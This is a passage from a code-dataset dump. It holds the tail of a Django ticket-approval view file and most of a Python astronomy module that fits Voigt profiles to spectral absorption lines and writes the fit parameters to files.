TicketApprov.objects.get(id=(json.loads(app[0]))['ticketapprov'])\n for item in app:\n item = json.loads(item)\n Product.objects.filter(name=item['product']).update(waitingquantity=F('waitingquantity') + TicketApprovItem.objects.filter(ticketapprov=item['ticketapprov'], product=item['product'])[0].sendquantity )\n Product.objects.filter(name=item['product']).update(waitingquantity=F('waitingquantity') - item['sendquantity'])\n TicketApprovItem.objects.filter(ticketapprov=item['ticketapprov'], product=item['product']).update(sendquantity=item['sendquantity'])\n return JsonResponse({\"message\": \"well done\"})\n\n\n@csrf_exempt\ndef deleteTicketApprov(request):\n req = request.body\n payload = tokenVerification(request.headers['Authorization'].split(' ')[1])\n my_json = req.decode('utf8')\n data=json.loads(my_json)\n TicketApprov.objects.get(id=data['id']).delete()\n return JsonResponse({\"message\": \"well done\"})\n\n\n\n\n\n\n","sub_path":"suivi_budgetaire/stock/ticket_approv.py","file_name":"ticket_approv.py","file_ext":"py","file_size_in_byte":8384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"444839925","text":"#!/usr/bin/env python\n# coding: utf-8\n\n#######################################################################\n###\n### params format (each entry a list): [restwave,coldens,bval,z,vel]\n### restwave (of an actual line), column density, bval - width of Gaussian, z (bulk), velocity (relative to z)\n###\n#######################################################################\n\nfrom __future__ import print_function, absolute_import, division, unicode_literals\n\nfrom PyQt5 import QtGui, QtCore\n\nfrom joebvp import joebgoodies as jbg\nimport numpy as np\nfrom scipy.signal import convolve\nfrom scipy.special import wofz\nfrom scipy.optimize import least_squares\nimport scipy.stats\nfrom joebvp.atomicdata import atomicdata\nfrom astropy import constants as const\nimport sys, os\ntry:\n import joebvp_cfg as cfg\nexcept:\n print(\n \"joebvp.makevoigt: No local joebvp_cfg.py found, using default cfg.py file from joebvp.\"\n )\n from joebvp import cfg\nfrom sklearn.cluster import MeanShift, estimate_bandwidth\nimport astropy.units as u\nfrom astropy.io import ascii\nfrom astropy.table import Table\nfrom linetools import utils as ltu\nfrom linetools.spectra.lsf import LSF\nimport pandas as pd\nfrom glob import glob\nfrom joebvp import VPmeasure\nfrom joebvp import makevoigt\nfrom joebvp import nmpfit\n\nln2 = np.log(2)\nc = const.c.to('km/s').value\n\nfrom linetools.spectra.xspectrum1d import XSpectrum1D\n\nfrom scipy.optimize import leastsq\n\n# directly lifted from joebvpfit:\n\n\ndef foldpars(pars, numpars=5):\n rows = len(pars) / numpars\n fpars = []\n for i in np.arange(numpars, dtype='int'):\n fparrow = []\n for j in np.arange(rows, dtype='int'):\n fparrow.append(pars[i + numpars * j])\n fpars.append(fparrow)\n return fpars\n\n\ndef unfoldpars(pars, numpars=5):\n rows = len(pars[0])\n ufpars = []\n for j in range(rows):\n for i in np.arange(numpars, dtype='int'):\n ufpars.append(pars[i][j])\n return ufpars\n\n\ndef voigtfunc(vwave, vpars):\n ### Check to see if cfg variables are set\n if isinstance(cfg.fitidx, int) | isinstance(cfg.wave, int):\n cfg.fitidx = fitpix(vwave, vpars)\n cfg.wave = vwave\n if len(cfg.lsfs) == 0:\n makevoigt.get_lsfs()\n\n vflux = np.zeros(len(vwave)) + 1.\n ### redo voigt function w/ numpy?\n factor = makevoigt.voigt(vwave, vpars[0], vpars[1], vpars[2], vpars[3],\n vpars[4])\n convfactor = makevoigt.convolvecos(vwave, factor, vpars[0], vpars[3])\n vflux *= convfactor\n\n return vflux\n\n\ndef readpars(filename, wave1=None, wave2=None):\n '''\n\n Parameters\n ----------\n filename : str\n Name of parameter input (or joebvp output) file\n File should at least have following columns:\n specfile|restwave|zsys|col|sigcol|bval|sigbval|vel|sigvel|nflag|bflag|vflag|vlim1|vlim2\n wave1 : float, optional\n Beginning of wavelength range over which to load lines (must be set with wave2)\n wave2 : float, optional\n End of wavelength range over which to load lines (must be set with wave1)\n\n Returns\n -------\n fitpars : list of lists\n Parameters for fit ready for fitter!\n fiterrors : array of numpy vectors\n Error array for the fitting initialized to '0' for each param\n parinfo : array of arrays\n Flags to be used in fit\n linecmts: list of lists\n Reliability and comment flags, e.g., from igmguesses\n '''\n linelist = ascii.read(filename)\n linerestwave = linelist['restwave'].data\n linez = linelist['zsys'].data\n if (wave1 == None) & (wave2 == None):\n lineshere = np.arange(len(linelist))\n elif ((wave1 == None) | (wave2 == None)) | (wave1 >= wave2):\n lineshere = np.arange(len(linelist))\n warnings.warn(\n 'Note that both \\'wave1\\' and \\'wave2\\' must be declared or neither must be. \\n Loading all lines in list.'\n )\n else:\n lineobswave = linerestwave * (1. + linez)\n lineshere = np.where((lineobswave > wave1) & (lineobswave < wave2))[0]\n linelist = linelist[lineshere]\n linelist['ions'] = atomicdata.lam2ion(linelist['restwave'])\n\n linelist.sort(['ions', 'zsys', 'vel', 'restwave'])\n\n linerestwave = linelist['restwave']\n zs = linelist['zsys']\n linecol = linelist['col']\n lineb = linelist['bval']\n linevel = linelist['vel']\n linevlim1 = linelist['vlim1']\n linevlim2 = linelist['vlim2']\n colflag = linelist['nflag']\n bflag = linelist['bflag']\n velflag = linelist['vflag']\n restwaves = linerestwave\n if (('rely' in linelist.colnames) & ('comment' in linelist.colnames)):\n pass\n elif ('rely' in linelist.colnames):\n linelist['comment'] = ['none'] * len(linelist)\n else:\n linelist['rely'] = ['-'] * len(linelist)\n linelist['comment'] = ['none'] * len(linelist)\n\n reliability = linelist['rely']\n comment = linelist['comment']\n initinfo = [colflag, bflag, velflag]\n initpars = [restwaves, linecol, lineb, zs, linevel, linevlim1, linevlim2]\n fitpars, parinfo = initlinepars(zs, restwaves, initpars, initinfo=initinfo)\n fiterrors = np.zeros([5, len(fitpars[0])]) # Initialize errors to zero\n #fiterrors[1] = colsig\n #fiterrors[2] = bsig\n #fiterrors[4] = velsig\n linecmts = [reliability, comment]\n\n return fitpars, fiterrors, parinfo, linecmts\n\n\ndef initlinepars(zs, restwaves, initvals=[], initinfo=[]):\n '''\n\n Parameters\n ----------\n zs : numpy vector of floats\n Redshifts of lines (this parameter will be fixed during fitting)\n restwaves : numpy vector of floats\n Rest frame wavelengths of lines to be fitted\n initvals : list of numpy vectors, optional\n Contains the following (in order): [restwaves,linecol,lineb,zs,linevel,linevlim1,linevlim2]\n Will default to values set in cfg.py if not set\n initinfo : list of numpy vectors, optional\n Contains the flags for fitting (in order): [colflag,bflag,velflag]\n Parameters with flags = 0 and 1 will freely value and fixed, respectively\n If 2 or more lines have the same flag value for the same parameter, the parameters will\n be tied to one another.\n\n Returns\n -------\n initpars : list of lists\n Parameters for fit ready for fitter!\n parinfo : array of arrays\n Flags to be used in fit\n '''\n\n ### Set atomic data for each line\n lam, fosc, gam = atomicdata.setatomicdata(restwaves)\n cfg.lams = lam\n cfg.fosc = fosc\n cfg.gam = gam\n\n initpars = [[], [], [], [], [], [], []]\n defaultcol = cfg.defaultcol\n defaultb = cfg.defaultb\n if initvals == []:\n for i in range(len(restwaves)):\n initpars[0].extend([restwaves[i]])\n initpars[1].extend([defaultcol])\n initpars[2].extend([defaultb])\n initpars[3].extend([zs[i]])\n initpars[4].extend([0.])\n initpars[5].extend([-cfg.defaultvlim])\n initpars[6].extend([cfg.defaultvlim])\n else:\n if len(initvals) == 5:\n for i in range(len(restwaves)):\n initpars[0].extend([initvals[0][i]])\n initpars[1].extend([initvals[1][i]])\n initpars[2].extend([initvals[2][i]])\n initpars[3].extend([initvals[3][i]])\n initpars[4].extend([initvals[4][i]])\n initpars[5].extend([-cfg.defaultvlim])\n initpars[6].extend([cfg.defaultvlim])\n else:\n initpars = [[], [], [], [], [], [], []]\n for i in range(len(restwaves)):\n initpars[0].extend([initvals[0][i]])\n initpars[1].extend([initvals[1][i]])\n initpars[2].extend([initvals[2][i]])\n initpars[3].extend([initvals[3][i]])\n initpars[4].extend([initvals[4][i]])\n initpars[5].extend([initvals[5][i]])\n initpars[6].extend([initvals[6][i]])\n\n ### If hard limits on Doppler b-value are smaller or greater than cfg.lowblim or cfg.upperblim,\n ### modify those limits\n maxb = np.max(initpars[2][:])\n minb = np.min(initpars[2][:])\n if maxb > cfg.upperblim:\n cfg.upperblim = maxb + 10.\n if minb < cfg.lowblim: cfg.lowblim = minb - 2.\n\n parinfo = np.zeros([5, len(restwaves)], dtype=int)\n parinfo[0] = parinfo[0] + 1\n parinfo[3] = parinfo[3] + 1\n if ((initinfo == []) & (initvals == [])):\n\n ### Look for multiplet membership of each line\n seriesassoc = np.zeros(len(restwaves)) - 99\n for i in range(len(restwaves)):\n for j in range(len(cfg.multiplets)):\n currmult = np.array(cfg.multiplets[j])\n if (abs(restwaves[i] -\n currmult[jbg.closest(currmult, restwaves[i])]) < 0.01):\n seriesassoc[i] = j\n\n uqions = np.unique(seriesassoc).tolist()\n\n if -99 in uqions: uqions.remove(-99)\n flagctr = 2\n for uqion in uqions:\n ionmatch = np.where(seriesassoc == uqion)[0]\n uqzs = np.unique(zs[ionmatch])\n for uz in uqzs:\n matchcrit = (zs == uz) & (seriesassoc == uqion)\n rellines = np.where(matchcrit)[0]\n uqlams = np.unique(restwaves[rellines])\n if len(uqlams) > 1:\n complist = []\n numcomps = []\n for ul in uqlams:\n matchcrit2 = matchcrit & (restwaves == ul)\n matches = np.where(matchcrit2)[0]\n complist.append(matches)\n numcomps.append(len(matches))\n numcomps = np.array(numcomps)\n complist = np.array(complist)\n compidxsort = sorted(range(len(numcomps)),\n key=lambda x: numcomps[x],\n reverse=True)\n numcompsort = numcomps[compidxsort]\n complistsort = complist[compidxsort]\n maxcomps = numcompsort[0]\n for compidx in range(maxcomps):\n for li in range(len(complistsort)):\n if compidx < numcompsort[li]:\n parinfo[1][complistsort[li][compidx]] = flagctr\n parinfo[2][complistsort[li][compidx]] = flagctr\n parinfo[4][complistsort[li][compidx]] = flagctr\n else:\n continue\n flagctr += 1\n\n elif initinfo != []:\n parinfo[1] = initinfo[0]\n parinfo[2] = initinfo[1]\n parinfo[4] = initinfo[2]\n elif ((initinfo == []) & (initvals != [])):\n\n ### Look for multiplet membership of each line\n seriesassoc = np.zeros(len(restwaves)) - 99\n for i in range(len(restwaves)):\n for j in range(len(cfg.multiplets)):\n currmult = np.array(cfg.multiplets[j])\n if (abs(restwaves[i] -\n currmult[jbg.closest(currmult, restwaves[i])]) < 0.01):\n seriesassoc[i] = j\n\n ### Fix measurements that are imported\n for i in range(len(restwaves)):\n if ((initpars[1][i] != defaultcol) & (initpars[2][i] != defaultb)):\n parinfo[1][i] = 1\n parinfo[2][i] = 1\n parinfo[4][i] = 1\n uqions = np.unique(seriesassoc).tolist()\n if -99 in uqions: uqions.remove(-99)\n flagctr = 2\n for uqion in uqions:\n ionmatch = np.where(seriesassoc == uqion)[0]\n uqzs = np.unique(zs[ionmatch])\n for uz in uqzs:\n matchcrit = (zs == uz) & (seriesassoc == uqion)\n rellines = np.where(matchcrit)[0]\n uqlams = np.unique(restwaves[rellines])\n if len(uqlams) > 1:\n complist = []\n numcomps = []\n for ul in uqlams:\n matchcrit2 = matchcrit & (restwaves == ul)\n matches = np.where(matchcrit2)[0]\n complist.append(matches.tolist())\n numcomps.append(len(matches))\n numcomps = np.array(numcomps)\n complist = np.array(complist)\n compidxsort = sorted(range(len(numcomps)),\n key=lambda x: numcomps[x])\n complistsort = complist[compidxsort]\n complistsort = complistsort.tolist()\n for i in range(len(complistsort) - 1):\n for idx in complistsort[i]:\n parinfo[1][idx] = flagctr\n parinfo[2][idx] = flagctr\n parinfo[4][idx] = flagctr\n for j in range(i + 1, len(complistsort)):\n idxidx = jbg.closest(\n initvals[4][complistsort[j]],\n initvals[4][idx])\n clidx = complistsort[j][idxidx]\n parinfo[1][clidx] = flagctr\n parinfo[2][clidx] = flagctr\n parinfo[4][clidx] = flagctr\n complistsort[j].remove(clidx)\n flagctr += 1\n\n return initpars, parinfo\n\n\ndef prepparinfo(linepars, parflags):\n parinfo = []\n parflags = np.array(parflags)\n numpars = 5\n for i in range(len(parflags[0])):\n parinfo.extend([{\n 'fixed': 1\n }, {\n 'fixed': 0\n }, {\n 'fixed': 0\n }, {\n 'fixed': 1\n }, {\n 'fixed': 0\n }])\n for j in range(1, len(parflags)):\n if parflags[j][i] == 1: parinfo[i * numpars + j]['fixed'] = 1\n elif parflags[j][i] <= 0: parinfo[i * numpars + j]['fixed'] = 0\n else:\n matches = np.where(np.array(parflags[j]) == parflags[j][i])[0]\n if matches[0] != i:\n tiedpar = int(matches[0] * numpars + j)\n parinfo[i * numpars +\n j]['tied'] = 'p[' + str(tiedpar) + ']'\n col = round(linepars[1][i], 2)\n vel = round(linepars[4][i], 2)\n bpar = round(linepars[2][i], 2)\n parinfo[numpars * i + 1]['limited'] = [1, 1]\n parinfo[numpars * i +\n 1]['limits'] = [round(col - 5., 2),\n round(col + 5., 2)]\n parinfo[numpars * i + 2]['limited'] = [1, 1]\n ### adjust b-value limits to allow for broadened HI features\n lydiff = abs(linepars[0][i] - cfg.lyseries)\n lymatch = np.where(abs(lydiff) <= 0.05)[0]\n if lymatch:\n parinfo[numpars * i + 2]['limits'] = [\n max([cfg.lowblim, bpar - 10.]),\n min([bpar + 10, cfg.upperblim_HI])\n ]\n else:\n parinfo[numpars * i + 2]['limits'] = [\n max([cfg.lowblim, bpar - 10.]),\n min([bpar + 10, cfg.upperblim])\n ]\n parinfo[numpars * i + 2]['step'] = 0.5\n parinfo[numpars * i + 2]['mpside'] = 2\n #parinfo[numpars*i+2]['relstep']=0.0001\n parinfo[numpars * i + 4]['limited'] = [1, 1]\n ### Allow velocity to flop around\n if parflags[4][i] < 0:\n flopamt = abs(parflags[4][i])\n parinfo[numpars * i + 4]['limits'] = [\n round(vel - flopamt, 2),\n round(vel + flopamt, 2)\n ]\n elif len(linepars) > 5:\n v1 = round(linepars[5][i], 2)\n v2 = round(linepars[6][i], 2)\n parinfo[numpars * i + 4]['limits'] = [v1, v2]\n else:\n parinfo[numpars * i +\n 4]['limits'] = [round(vel - 50., 2),\n round(vel + 50., 2)]\n parinfo[numpars * i + 4]['step'] = 1.\n #parinfo[numpars*i+4]['relstep']=0.01\n return parinfo\n\n\ndef fitpix(wave, pararr, find_bad_pixels=True):\n\n if find_bad_pixels:\n # define bad pixels\n cfg.bad_pixels = update_bad_pixels(\n ) # this variable stores the indices of bad pixels\n else:\n cfg.bad_pixels = []\n\n ll = pararr[0]\n lz = pararr[3]\n lv1 = pararr[5]\n lv2 = pararr[6]\n relpix = []\n for i in range(len(ll)):\n vels = jbg.veltrans(lz[i], wave, ll[i])\n p1 = jbg.closest(vels, lv1[i])\n p2 = jbg.closest(vels, lv2[i])\n\n if ((p1 >= 10) & (p2 <= (len(wave) - 1 - 10))):\n relpix.extend(range(p1 - 10, p2 + 10))\n elif (p1 < 10):\n relpix.extend(range(0, p2 + 10))\n else:\n relpix.extend(range(p1 - 10, len(wave) - 1))\n rp = np.unique(np.array(relpix))\n clean_rp = np.array([i for i in rp if i not in cfg.bad_pixels])\n return clean_rp\n\n\ndef stevevoigterrfunc(x, xall0, notfixed, indices, wavelength, flux, sig):\n xall = xall0.copy()\n\n xall[notfixed] = x[indices]\n\n folded_xall = foldpars(xall)\n model = voigtfunc(wavelength, folded_xall)\n status = 0\n\n residuals = (flux[cfg.fitidx] - model[cfg.fitidx]) / sig[cfg.fitidx]\n\n try:\n residuals = residuals.value\n except AttributeError:\n pass\n return (residuals)\n\n\ndef update_bad_pixels():\n # define bad pixels\n cond_badpix = (cfg.spectrum.wavelength <= cfg.spectrum.wvmin) | \\\n (cfg.spectrum.wavelength >= cfg.spectrum.wvmax) | \\\n (cfg.spectrum.sig <= 0)\n #(cfg.spectrum.flux / cfg.spectrum.sig < cfg.min_sn) # bad S/N\n # spectral gaps\n for gap in cfg.spectral_gaps:\n cond_gap = (cfg.spectrum.wavelength >=\n gap[0] * u.AA) & (cfg.spectrum.wavelength <= gap[1] * u.AA)\n cond_badpix = cond_badpix | cond_gap\n bad_pixels = np.where(cond_badpix)[0]\n return bad_pixels\n\n\ndef various_indices(parinfo):\n \"\"\"\n Parameters:\n -----------\n\n parinfo : list of dictionaries\n\n Returns:\n --------\n\n pfixed : list of integers in numpy array\n fixed/unfixedness of parameters.\n ptied : list of strings in numpy array\n tiedness or lack thereof of parameters.\n ifree : list of integers in numpy array\n indices of free parameters.\n indices : list of floats in numpy array\n index indicating which other tied parameter a given parameter is tied to.\n\n \"\"\"\n\n npar = len(parinfo)\n\n indices = np.zeros([npar])\n\n ## FIXED parameters ?\n pfixed = parameterInformationFunction(parinfo, 'fixed', default=0, n=npar)\n\n ptied = parameterInformationFunction(parinfo, 'tied', default='', n=npar)\n\n qanytied = 0\n for i in range(npar):\n ptied[i] = ptied[i].strip()\n if (ptied[i] != ''): qanytied = 1\n\n kk = 0\n for ii in range(len(indices)):\n if pfixed[ii] == 1:\n continue\n else:\n if ptied[ii] == '':\n\n indices[ii] = kk\n\n kk = kk + 1\n else:\n ll = int(ptied[ii][2:-1])\n indices[ii] = indices[ll]\n\n ## Finish up the free parameters\n ifree = np.where(np.array(pfixed) == 0)\n nfree = len(ifree)\n if nfree == 0:\n raise ValueError('no free parameters.')\n\n inotfixed = np.where(np.array(pfixed) == 0)\n\n indices = indices[inotfixed]\n\n for i in range(npar):\n pfixed[i] = pfixed[i] or (\n ptied[i] != '') ## Tied parameters are also effectively fixed\n return (pfixed, ptied, ifree, indices)\n\n\ndef parameterInformationFunction(parinfo=None, key='a', default=None, n=0):\n #if (self.debug): print('Entering parinfo...')\n\n # makes sure n is the length of parinfo:\n if (n == 0) and (parinfo is not None): n = len(parinfo)\n\n # returns nothing if parinfo is empty:\n if (n == 0):\n values = default\n return (values)\n\n # makes a list of the values of the specified key/item for each parameter\n values = []\n for i in range(n):\n if ((parinfo is not None) and (key in parinfo[i])):\n values.append(parinfo[i][key])\n else:\n values.append(default)\n\n # Convert to numeric arrays if possible\n test = default\n if (type(default) == list): test = default[0]\n if (type(test) == int):\n values = np.asarray(values, dtype=np.int)\n elif (type(test) == float):\n values = np.asarray(values, dtype=np.float)\n\n return (values)\n\n\n# here are the functions needed for calculating fit errors in stevebvpfit:\n\n\ndef calc_covar(rr, ipvt=None, tol=1.e-14):\n\n if np.rank(rr) != 2:\n print('ERROR: r must be a two-dimensional matrix')\n return (-1)\n s = np.shape(rr)\n n = s[0]\n if s[0] != s[1]:\n print('ERROR: r must be a square matrix')\n return (-1)\n\n if (ipvt is None): ipvt = np.arange(n)\n r = rr.copy()\n r.shape = [n, n]\n\n ## For the inverse of r in the full upper triangle of r\n l = -1\n tolr = tol * abs(r[0, 0])\n for k in range(n):\n if (abs(r[k, k]) <= tolr): break\n r[k, k] = 1. / r[k, k]\n for j in range(k):\n temp = r[k, k] * r[j, k]\n r[j, k] = 0.\n r[0:j + 1, k] = r[0:j + 1, k] - temp * r[0:j + 1, j]\n l = k\n\n ## Form the full upper triangle of the inverse of (r transpose)*r\n ## in the full upper triangle of r\n if l >= 0:\n for k in range(l + 1):\n for j in range(k):\n temp = r[j, k]\n r[0:j + 1, j] = r[0:j + 1, j] + temp * r[0:j + 1, k]\n temp = r[k, k]\n r[0:k + 1, k] = temp * r[0:k + 1, k]\n\n ## For the full lower triangle of the covariance matrix\n ## in the strict lower triangle or and in wa\n wa = np.repeat([r[0, 0]], n)\n for j in range(n):\n jj = ipvt[j]\n sing = j > l\n for i in range(j + 1):\n if sing: r[i, j] = 0.\n ii = ipvt[i]\n if ii > jj: r[ii, jj] = r[i, j]\n if ii < jj: r[jj, ii] = r[i, j]\n wa[jj] = r[j, j]\n\n ## Symmetrize the covariance matrix in r\n for j in range(n):\n r[0:j + 1, j] = r[j, 0:j + 1]\n r[j, j] = wa[j]\n\n return (r)\n\n\ndef calc_perrors(jac, ifree, numpars=5):\n n = len(ifree)\n try:\n rr = np.linalg.inv(jac.T @ jac)\n except np.linalg.LinAlgError:\n # idk should I do this?\n rr = np.linalg.pinv(jac.T @ jac)\n print('using pseudo inverse for Jacobian')\n covar = np.zeros([numpars, numpars], np.float)\n\n for i in range(n):\n idx = ifree + ifree[i] * numpars\n np.put(covar, idx, rr[:, i])\n\n d = np.sqrt(np.diagonal(covar))\n\n return (d)\n\n\n# The main event:\ndef stevebvpfit(wave, flux, sig, flags, linepars=None, xall=None):\n\n if (linepars is None):\n raise ValueError('Must pass parameters in linepars.')\n return\n\n # Only feed to the fitter the parameters that go into the model\n partofit = linepars[:5]\n\n parinfo = prepparinfo(partofit, flags)\n\n npar = len(parinfo)\n\n ## Be sure that PARINFO is of the right type\n if (parinfo is not None):\n if (type(parinfo) != list):\n raise ValueError('PARINFO must be a list of dictionaries.')\n return\n\n else:\n if (type(parinfo[0]) != dict):\n raise ValueError('PARINFO must be a list of dictionaries.')\n return\n\n ## If the parameters were not specified at the command line, then\n ## extract them from PARINFO\n\n if (xall is None):\n\n xall = parameterInformationFunction(parinfo, 'value')\n if (xall is None):\n raise ValueError(\n 'either xall or PARINFO(*)[\"value\"] must be supplied.')\n xall = np.ravel(np.array(xall).T)\n\n # function that deals with tied and fixed parameters and creates\n # indices list to go from non-redundant to redundant array:\n\n indices_and_friends = various_indices(parinfo)\n\n pfixed, ptied, ifree, indices = indices_and_friends\n\n indices = indices.astype(np.int)\n ifree = np.squeeze(ifree)\n ## Compose only VARYING parameters\n x = np.squeeze(xall)[np.squeeze(\n pfixed == 0)] ## x is the set of free parameters\n\n ## LIMITED parameters ?\n limited = parameterInformationFunction(parinfo,\n 'limited',\n default=[0, 0],\n n=npar)\n limits = parameterInformationFunction(parinfo,\n 'limits',\n default=[0., 0.],\n n=npar)\n\n if (limited is not None) and (limits is not None):\n\n ## Error checking on limits in parinfo\n wh = np.nonzero((limited[:, 0] & (xall < limits[:, 0]))\n | (limited[:, 1] & (xall > limits[:, 1])))\n\n if (len(wh[0]) > 0):\n raise ValueError('parameters are not within PARINFO limits')\n return\n\n wh = np.nonzero((limited[:, 0] & limited[:, 1])\n & (limits[:, 0] >= limits[:, 1]) & (pfixed == 0))\n if (len(wh[0]) > 0):\n raise ValueError('PARINFO parameter limits are not consistent')\n return\n freeanduntied = np.where(np.squeeze(pfixed == 0))[0]\n ## Transfer structure values to local variables\n qulim = np.take(limited[:, 1], freeanduntied)\n ulim = np.take(limits[:, 1], freeanduntied)\n qllim = np.take(limited[:, 0], freeanduntied)\n llim = np.take(limits[:, 0], freeanduntied)\n\n # Save the velocity windows to add back to the parameter array\n vlim1 = linepars[5]\n vlim2 = linepars[6]\n # Get atomic data\n lam, fosc, gam = atomicdata.setatomicdata(linepars[0])\n cfg.lams = lam\n cfg.fosc = fosc\n cfg.gam = gam\n # Set fit regions\n cfg.fitidx = fitpix(wave, linepars)\n\n # Prep parameters for fitter\n\n partofit = unfoldpars(partofit)\n\n modelvars = {'l': wave, 'y': flux, 'err': sig}\n\n bnds = (np.squeeze(np.where(qllim == 1, llim, -np.inf)),\n np.squeeze(np.where(qulim == 1, ulim, np.inf)))\n\n arg = [\n xall, ifree, indices, modelvars['l'], modelvars['y'], modelvars['err']\n ]\n\n # here is where fitting happens:\n\n m = least_squares(stevevoigterrfunc,\n x,\n bounds=bnds,\n args=arg,\n kwargs={},\n verbose=True)\n\n if m.status < 0: print('Fitting error:', m.message)\n\n xall_fitted = xall.copy()\n\n xall_fitted[ifree] = m['x'][indices]\n\n fitpars = foldpars(xall_fitted)\n\n # This is a super-hacky fix to the issue of parameters having Jacobians of 0.\n # It could obscure other problems and so it would make sense to replace it\n # at some point.\n badvarmask = np.all(np.isclose(m.jac, 1e-10), axis=0)\n if np.any(badvarmask):\n try:\n bad_var_ind, = np.where(badvarmask)\n # Replacing bad columns with value near 0.\n m.jac[:, bad_var_ind] = 1e-5\n # Giving rest wavelength and redshift of bad lines. Also really janky in and\n # of itself so that's fun.\n bad_var_indices_mask = np.in1d(indices, bad_var_ind)\n bad_ifree = ifree[bad_var_indices_mask]\n bad_comp_inds = np.unique(bad_ifree // 5)\n for comp in bad_comp_inds:\n bad_wav = fitpars[0][comp]\n bad_red = fitpars[3][comp]\n print('Bad component of {0:.5f} at {1:.5f}.'.format(\n np.float(bad_wav), np.float(bad_red)))\n except IndexError:\n pass\n\n perr = calc_perrors(m.jac, freeanduntied, numpars=xall.size)\n\n fitperr = foldpars(perr)\n\n for par in perr:\n par = np.ravel(np.array(par))\n\n # Adding in reduced chi-squared bit:\n rchi2 = 2 * m.cost / (len(cfg.fitidx) - len(freeanduntied))\n # Add velocity windows back to parameter array\n fitpars.append(vlim1)\n fitpars.append(vlim2)\n\n # prints results in terminal/notebook/whatever thing you have python running from\n print('\\nFit results: \\n')\n for i in range(len(fitpars[0])):\n print(\n jbg.tabdelimrow([\n round(fitpars[0][i], 2),\n jbg.decimalplaces(fitpars[3][i], 5),\n jbg.roundto(fitpars[1][i], 5),\n jbg.roundto(fitpars[2][i], 5),\n jbg.roundto(fitpars[4][i], 5)\n ])[:-2])\n print(\n jbg.tabdelimrow([\n ' ', ' ', ' ',\n round(fitperr[1][i], 3),\n round(fitperr[2][i], 3),\n round(fitperr[4][i], 3)\n ]))\n print('\\nReduced chi-squared: {0:f}'.format(rchi2))\n return fitpars, fitperr, rchi2\n\n\n# ... the other main event:\ndef fit_to_convergence(wave,\n flux,\n sig,\n flags,\n linepars,\n xall,\n maxiter=50,\n itertol=0.0001):\n '''\n\n Parameters\n ----------\n wave\n flux\n sig\n flags\n linepars\n xall\n\n maxiter : int\n Maximum number of times to run the fit while striving for convergence\n\n itertol : float\n Maximum difference in any parameter from one fitting iteration to the next. Routine will fit again if\n any difference in the measurements exceeds itertol.\n\n\n Returns\n -------\n\n '''\n fitpars = linepars\n oldfitpars = np.zeros([7, len(fitpars[0])]) - 99\n ctr = 0\n okay = 1\n while ((np.max(np.abs(fitpars - oldfitpars)) > itertol) & (ctr < maxiter)):\n ctr += 1\n\n try:\n # so the fitpars from the last iteration doesn't get erased:\n oldfitpars = fitpars\n fitpars, fiterrors, rchi2 = stevebvpfit(wave,\n flux,\n sig,\n flags,\n linepars=linepars,\n xall=xall)\n fitpars = np.array(fitpars)\n print('Iteration', ctr, '-')\n\n except:\n print('Fitting error!')\n print(\"Unexpected error:\", sys.exc_info()[0])\n okay = 0\n raise\n\n if okay != 0:\n print('Fit converged after', ctr, 'iterations.')\n return fitpars, fiterrors, rchi2\n else:\n return linepars, fiterrors, rchi2\n\n\ndef writerchi2(rchi2, outfilename):\n '''\n Writes reduced input group's chi-squared to file.\n '''\n rchi2file = open(outfilename, 'wt')\n rchi2file.write(str(rchi2))\n rchi2file.close()\n\n\ndef writelinepars(fitpars,\n fiterrors,\n parinfo,\n specfile,\n outfilename,\n linecmts=None):\n '''\n Write fit parameters out to file.\n\n Parameters\n ----------\n fitpars : list of lists\n Parameters for fit ready for fitter!\n fiterrors : array of numpy vectors\n Error array for the fitting initialized to '0' for each param\n parinfo : array of arrays\n Flags to be used in fit\n specfile : str\n Name of the input file containing the spectrum\n outfilename : str\n Parameter output filename\n linecmts : list of lists, optional\n Reliability flags and comments, e.g., from igmguesses\n\n '''\n import os\n ### Set outputs and open files\n bigfiletowrite = cfg.largeVPparfile\n filetowrite = outfilename\n if os.path.isfile(filetowrite):\n VPparfile = open(filetowrite, 'wb')\n bigparfile = open(bigfiletowrite, 'ab') # Append to the running list\n else:\n VPparfile = open(filetowrite, 'wb')\n bigparfile = open(bigfiletowrite, 'wb')\n\n ### Prep header of line parameter file\n if linecmts is not None:\n header = b'specfile|restwave|zsys|col|sigcol|bval|sigbval|vel|sigvel|nflag|bflag|vflag|vlim1|vlim2|wobs1|wobs2|pix1|pix2|z_comp|trans|rely|comment \\n'\n else:\n header = b'specfile|restwave|zsys|col|sigcol|bval|sigbval|vel|sigvel|nflag|bflag|vflag|vlim1|vlim2|wobs1|wobs2|pix1|pix2|z_comp|trans \\n'\n VPparfile.write(header)\n bigparfile.write(header)\n\n ### Grab parameters/info for each line\n for i in range(len(fitpars[0])):\n zline = fitpars[3][i]\n vlim1 = fitpars[5][i]\n vlim2 = fitpars[6][i]\n restwave = fitpars[0][i]\n wobs1 = restwave * (1 + zline + vlim1 / c)\n wobs2 = restwave * (1 + zline + vlim2 / c)\n pix1 = jbg.closest(cfg.wave, wobs1)\n pix2 = jbg.closest(cfg.wave, wobs2)\n trans = atomicdata.lam2ion(fitpars[0][i])\n z_comp = ltu.z_from_dv(fitpars[4][i] * u.km / u.s, zline)\n if linecmts is not None:\n towrite = jbg.pipedelimrow([\n specfile, restwave,\n round(zline, 5),\n round(fitpars[1][i], 3),\n round(fiterrors[1][i], 3),\n round(fitpars[2][i], 3),\n round(fiterrors[2][i], 3),\n round(fitpars[4][i], 3),\n round(fiterrors[4][i], 3), parinfo[1][i], parinfo[2][i],\n parinfo[4][i], vlim1, vlim2, wobs1, wobs2, pix1, pix2,\n round(z_comp, 5), trans, linecmts[0][i], linecmts[1][i]\n ])\n else:\n towrite = jbg.pipedelimrow([\n specfile, restwave,\n round(zline, 5),\n round(fitpars[1][i], 3),\n round(fiterrors[1][i], 3),\n round(fitpars[2][i], 3),\n round(fiterrors[2][i], 3),\n round(fitpars[4][i], 3),\n round(fiterrors[4][i], 3), parinfo[1][i], parinfo[2][i],\n parinfo[4][i], vlim1, vlim2, wobs1, wobs2, pix1, pix2,\n round(z_comp, 5), trans\n ])\n VPparfile.write(towrite.encode())\n bigparfile.write(towrite.encode())\n VPparfile.close()\n bigparfile.close()\n print('Line parameters written to:')\n print(filetowrite)\n\n\ndef writeVPmodel(outfile, wave, fitpars, normflux, normsig):\n\n from astropy.table import Table\n\n model = voigtfunc(wave, fitpars)\n modeltab = Table([wave, model, normflux, normsig],\n names=['wavelength', 'model', 'normflux', 'normsig'])\n\n dummycont = np.ones(len(wave))\n\n spec = 